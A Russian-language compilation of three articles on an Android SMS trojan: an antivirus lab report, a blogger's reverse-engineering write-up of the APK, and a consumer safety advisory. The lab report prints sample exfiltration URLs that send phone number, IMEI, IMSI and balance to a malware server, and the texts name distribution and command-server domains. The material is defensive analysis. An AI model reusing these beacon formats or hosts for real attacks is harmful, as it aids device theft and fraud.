Trojan.SMSSend.Android
Антивирусная лаборатория Zillya! провела исследование атаки на смартфоны украинцев, о которой 1 сентября сообщил ресурс zik.ua и выявила следующее.
Общее описание
Троянская программа для мобильных телефонов, работающих на базе операционной системы Android. На момент проведения данного исследования получены массовые сигналы от пострадавших пользователей в Украине, России и Белоруссии.
Метод распространения
Пользователь получает SMS сообщение вида «Привет J Тебе фото https://www.soloboro.ru/gayn/. » где вместо знаков вопросов указан телефон пользователя, которому адресовано сообщение.
При этом ссылка на сайт может быть другой (нами зафиксировано как минимум три различных сайта, на которые вели ссылки).
При попытке открыть сообщения, на телефон загружается файл FOTO_ALBOM.apk и запускается установка троянского приложения. При этом система запрашивает у пользователя разрешение на доступ данного приложения к конфиденциальным данным. В случае положительного ответа пользователя в систему устанавливается троянское приложение.
После установки в системе появляется приложение «Google Play» размером около 200 Кб, являющееся троянской программой Trojan.SMSSend.Android. Его очень легко перепутать с системным приложением «Google Play Маркет», на что злоумышленниками и была сделана ставка.
Троян получает доступ к адресной книге устройства и начинает рассылку вирусных СМС всем адресатам, кроме тех, чьи номера начинаются на 1 (международный телефонный код США = +1). Данная процедура повторяется троянской программой регулярно, поэтому пользователи получают по несколько вирусных СМС с одного и того же зараженного телефона.
Вредоносные функции
В первую очередь, троян передаёт базовую информацию об устройстве пользователя на свой сервер: номер телефона, IMEI, IMSI, страну, версию операционной системы, модель аппарата, состояние мобильного счета и прочие данные. При этом троян способен анализировать сообщения от оператора о пополнении счет на конкретную сумму, где анализируются русскоязычные сообщения, содержащие слова «баланс» и «пополнено», как русскими, так и латинскими символами.
Примеры запросов, передающих информацию о телефоне:
https://goldfan.ru/bs/r.php/country=ua&phone=380632330522&op=Android&balance=0&k=12ge5vr9&imei=289212345678901&imsi=123456789012345&os=4.0.2&sdk=15&model=samsungNexusS&time=2012-11-14 16:22:56&v=4
https://goldfan.ru/bs/g.php/imei=289212345678901&balance=0&k=12ge5vr9&time=2012-11-14 16:22:56&v=4
https://goldfan.ru/bs/s.php/id=4&imei=289212345678901&time=2012-11-14 16:22:56&v=4
Одной из функций троянской программы является перехват входящих звонков и входящих СМС. Входящие звонки абонементу автоматически сбрасываются, лишая возможности других пользователей дозвониться к зараженному абоненту и предупредить его о рассылающихся с его телефона сообщениях.
Троян имеет функцию загрузки из Internet других компонентов и установки их в систему. Таким образом, у злоумышленников всегда остаётся возможность обновить функциональность троянской программы, что дает нам основания предположить, что данная троянская программа является всего лишь «транспортным механизмом» для более сложной и опасной троянской программы, которая может раздаваться адресно, конкретным абонентам. При этом загружаемая программа сохраняется с именем /mnt/sdcard/download/update.apk и запускается на установку автоматически.
Методы защиты
Данное троянское приложение может установиться на устройство только в том случае, если в его настройках безопасности включен параметр «Разрешить установку приложений из неизвестных источников». По умолчанию этот параметр выключен на всех устройствах, и включают его, как правило, для того что бы установить приложения из каких либо источников помимо “Google Play Market” (например с SD карты или другого сайта).
Таким образом, основной метод защиты – это всего лишь выключение параметра «Разрешить установку приложений из неизвестных источников» в настройках смартфона.
Источник
История реверс-инжиниринга одного SMS трояна для Android
Все началось с жалоб одного моего доброго друга, по совместительству владельца устройства на Android. Он жаловался, что оператор постоянно снимает с него деньги неизвестно за что. После звонков оператору выяснилось, что средства снимали за премиум SMS, которые мой друг якобы отправлял. Я сам неоднократно нарывался в Интернетах на подозрительные сайты, которые предлагают скачать apk с игрой/программой/Live Wallpaper, при установке которого выясняется, что это всего лишь программа, которая отправляет SMS на премиум номера. Но в этом случае если нажал кнопку, то «сам дурак», потому что правила в таких программках явно говорят, что последует отправка SMS на платные номера, да и ссылки они в итоге предоставляют на реальные программы.
Так или иначе, ко мне закралось подозрение, что здесь ситуация тоже завязана на таком роде деятельности, и я взялся разобраться, куда же все-таки утекают денежки.
Безопасная установка приложения
Начнем с того, что мой друг запамятовал, откуда он скачивал последние программы из сети на свой девайс, из него удалось вытрясти только следующую ссылку mobisity.ru (Осторожно, сайт распространяет вредоносное ПО!). Покопавшись на сайте, я вытащил оттуда APK.
Теперь, когда предыстория известна читателю, можно перейти к самому интересному — анализу приложения. Начнем с безопасной установки приложения, а именно, установим его на эмулятор и посмотрим как оно действует.
Запускаем штатный эмулятор Android, желательно версии 2.2 или выше (на более старые версии приложение не устанавливается), для этого запускаем эмулятор через AVD (Android Virtual Device Manager) и выполняем команду
В списке приложений появляется наблюдаем нашего трояна, под именем Music и с соответствующей иконкой.
Запускаем и наблюдаем процесс какой-то «установки», после которой нам предлагается нажать кнопку «далее»
Если нажать кнопку хардварную кнопку Menu, то можно будет открыть правила и прочесть, что после нажатия кнопки пойдет отправка SMS на платные номера. Ну и ладно, значит, пока что это из разряда «сам дурак». Так куда же постоянно утекают средства? Пока не понятно, исследуем дальше.
Анализ кода
Для анализа я использовал следующие инструменты: jd-gui, dex2jar и apktool.
Первым делом разберем APK при помощи apktool и посмотрим на структуру проекта. Для этого необходимо выполнить команду Анализ внутренней структуры проекта ничего интересного не дает, за исключением того, что в папке assets лежит непонятный файл data.xml, видимо он хранит какие-то данные, но зашифрован, так как, на первый взгляд, данные не поддаются простому анализу.
Ну что же, остается только смотреть код, для этого используем dex2jar. Вытаскиваем при помощи своего любимого архиватора файл из APK с названием classes.dex, и при помощи dex2jar преобразовываем его в jar файл. Полученный jar нужно открыть в программе jd-gui. Всё, теперь у нас есть весь (ну или почти весь) код приложения:
Прежде чем сломя голову бросаться анализировать код, я решил посмотреть файл AndroidManifest.xml, как правило из него можно вытащить много полезной информации о приложении.
Просмотрев файл, я заинтересовался BroadcastReceiver’ом с именем StartupReceiver — очевидно, что он запускает какой-то код при загрузке системы, на это указывают заявленные intent-filters.
По всей видимости, в случае необходимости, здесь производится биндинг с системным сервисом, который обеспечивает работу USSD запросов. Логично было бы предположить, что троян таким образом отслеживает баланс пользователя.
Кроме этого, в коде видно, что запускается сервис UpdateService.
Очевидно, что данный сервис при старте устанавливает при помощи планировщика AlarmManager запуск Intent, который является сигналом к запуску BroadcastReceiver’a с именем UpdateReceiver, а если точнее, то его метода — onReceive.
Здесь мы видим, что троян проверяет текущий баланс пользователя, прежде чем отправлять SMS. И кроме этого, он запускает AsyncTask с именем m, который отправляет запрос к скрипту mxclick.com/getTask.php. Скрипт по всей видимости отдает нужный номер, на который будет осуществлена отправка тех или иных SMS. Ну и в итоге UpdateReceiver выполняет отправку SMS, тем самым осушая баланс бедного пользователя.
Ну вот, собственно говоря и всё — дальше код можно не разбирать, мы увидели, что опустошение баланса пользователя достигается именно отправкой SMS на премиум номера. Однако, я наткнулся еще на пару интересных моментов, когда просматривал код трояна. Например, входящие SMS с номера 111, который является сервисным номером МТС, блокируются — таким образом, юзер вообще ничего не слышит и не видит, когда его баланс постепенно уходит в минус.
Этим занимается класс MessageReceiver, вот его определение в AndroidManifest.xml
Видно, что ему установлен высокий приоритет, таким образом ему удается первым обработать входящие сообщения на девайс. Ну и внутри метода onReceive, мы видим, что если SMS идет с номера 111, то intent перехватывается, то есть broadcast сообщение обрывается на этом обработчике и не идет дальше к остальным приложениям.
Еще один интересный момент, который на самом деле позволяет сообществу заставить мошенников ответить за свои поступки — зашифрованная база, о которой я упоминал в начале поста. Во время просмотра кода было выяснено, что файл с номерами был зашифрован алгоритмом Blowfish в режиме ECB. Это симметричный алгоритм шифрования, с хорошим ключом на его взлом могли бы уйти годы, но… Разработчики трояна особо не парились:
С известным ключом мне стоило только набросать пару строк на Яве, и файл был расшифрован:
Еще один момент — все USSD запросы проходят в фоновом режиме, то есть троян может сколько угодно проверять баланс пользователя, тот ничего не заподозрит. По всей видимости реализация фонового выполнения USSD запросов была скопирована разработчиками трояна с сайта commandus. В качестве домашнего задания читателям предлагается понять, почему была скопирована именно реализация с этого сайта и найти подтверждение тому в коде.
Заключение
Хотелось бы сказать, что разработка таких приложений является прямым нарушением закона РФ, а именно статей 159 и 273 УК РФ. Теперь у мошенников уже отмазаться не получится, так как средства с баланса снимаются не после нажатия абстрактной кнопки, где пользователь принимает на себя всю ответственность за последствия. Здесь баланс может опустошаться годами и пользователь может вообще ничего не заподозрить.
Мошенники, а таковыми по определению являются и контент-провайдеры номеров (потому что оказывают прямое содействие в получении прибыли незаконным или мошенническим путем) 8503, 7202, 7201, 7204, 7212, 3303, 3336 должны быть уголовно наказаны. Кстати, конкретных провайдеров для этих номеров можно посмотреть, например, на сайте Мегафона или Билайна. Дабы не быть голословным, привожу конкретные названия замешанных контент провайдеров, которым принадлежат данные номера: ИнкорМедиа ООО, СМС сервисы, ООО (Шутка дня), ООО Инвест Телеком и так далее.
Кроме этого, скорее всего какие-то данные о конкретных виновниках можно выцепить из URL, на который уходят запросы из трояна, а именно: mxclick.com/getTask.php. А вообще, заинтересованные читатели могут по возможности сами попробовать найти другие следы мошенников.
Лично я надеюсь, что глубокоуважаемые операторы Мегафон, Билайн, МТС, Теле2 и остальные примут серьезные меры по поводу контент-провайдеров, потому что они не проследили за использованием их номеров, и кто-то наконец докопается до настоящих виновников, которые разрабатывают и распространяют эти трояны и заставит их ответить по всей строгости закона.
Источник
Телефон поймал вирус через СМС: что угрожает Андроид?
Распространение нового вируса СМС на Андроид ставит под угрозу безопасность устройств большого количества пользователей. Что же делать, если вам пришло сообщение с сомнительным текстом, и как обезопасить себя и свое устройство? Далее расскажем подробно о том, какую угрозу несет в себе этот Троян и как можно его идентифицировать.
Как происходит заражение устройства?
Распространяется Троян на телефонах и планшетах с помощью СМС-сообщений, и работает как системный сервис, называющийся com.driver.system. Как же понять, что на телефон попал вирус через смс, и действительно ли полученное соощение несет опасность?
Выглядит это СМС следующим образом:
привет [смайлик] тебе фото https:// m**o*an.ru/oujr/380688086*6*
Полученная в сообщении ссылка — это адрес на загрузку apk файла, в котором спрятан «Trojan.SMSSend», что перехватит управление вашим гаджетом Андроид и будет использовать его в своих целях. Антивирус определяет эту угрозу как HEUR:Trojan-SMS.AndroidOS.Opfake.bo
Вы можете прочитать нашу статью о том, как защитить смартфон от вирусов, чтобы не подвергаться риску и быть уверенным в безопасности своих данных.
Как правило, отправитель – это человек из списка ваших контактов, именно поэтому пользователи часто без опаски открывают сообщение и заражают свое устройство. На самом деле в этот момент они активируют Троян и вирус отправляет СМС (Андроид-устройства и отправляющего, и получателя с момента отправки находятся под угрозой). Таким образом, всё больше владельцев мобильных устройств оказываются в зоне риска.
Что можно сделать на этом этапе? Только одно — ни в коем случае не открывать такое сообщение, чтобы по неосторожности не скачать Троян!
Чем опасен этот вирус?
Основная опасность СМС-вируса на Android заключается в том, что на зараженном телефоне хакеры могут удаленно выполнять практически любые действия, например:
- Рассылка сообщений вашим друзьям с определенным текстом.
- Блокировка звонков.
- Кража со счет денежных средств, а также информации об установленных приложениях, операторе, учетных записях, имеющихся файлах, телефонном номере и сообщениях.
- Управление черным списком – добавление или удаление номеров из него.
- Выполнение юссд-запросов
- Включение/отключение диктофонных записей и многие другие неприятные вещи
Это означает, что злоумышленники получают полный контроль над вашим устройством, и без вашего ведома управляют работой телефона или планшета.
Что делать, если произошло заражение?
На устройствах Андроид СМС-вирус Троян может маскироваться под другие программы. Вы можете долгое время не замечать происходящих изменений, ведь он устроен очень хитро.
Избавиться от такого Трояна не так-то просто, но все же возможно. Предлагаем вам узнать, как удалить смс вирус с телефона Андроид, если вы уже столкнулись с этой проблемой.
Запомните! В случае, если ваш телефон на Андроид поймал вирус через СМС, то последствия могут быть самыми различными, если не предпринять никаких действий.
Источник
